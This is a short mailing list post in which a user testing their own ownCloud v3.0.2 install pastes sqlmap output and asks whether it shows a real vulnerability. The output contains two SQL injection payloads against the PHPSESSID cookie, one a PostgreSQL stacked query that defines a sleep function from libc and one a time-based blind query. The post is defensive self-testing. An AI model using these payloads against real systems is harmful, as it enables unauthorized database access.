Hi all.
We decided to check my owncloud different scanners security. When
testing sqlmap faced with the following:
sqlmap identified the following injection points with a total of 16640
HTTP(s) requests:
---
Place: Cookie
Parameter: PHPSESSID
Type: stacked queries
Title: PostgreSQL < 8.2 stacked queries (Glibc)
Payload: PHPSESSID=ispocimq3ns4o9r7ak2u0a6ak0"))); CREATE OR REPLACE
FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C'
STRICT; SELECT sleep(5);-- AND ((("JEUt"="JEUt
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: PHPSESSID=ispocimq3ns4o9r7ak2u0a6ak0"))) AND 1939=(SELECT
1939 FROM PG_SLEEP(5)) AND ((("YsVe"="YsVe
---
This is the actual vulnerability? ownCloud v3.0.2
_______________________________________________
Owncloud mailing list
[email protected]
https://mail.kde.org/mailman/listinfo/owncloud
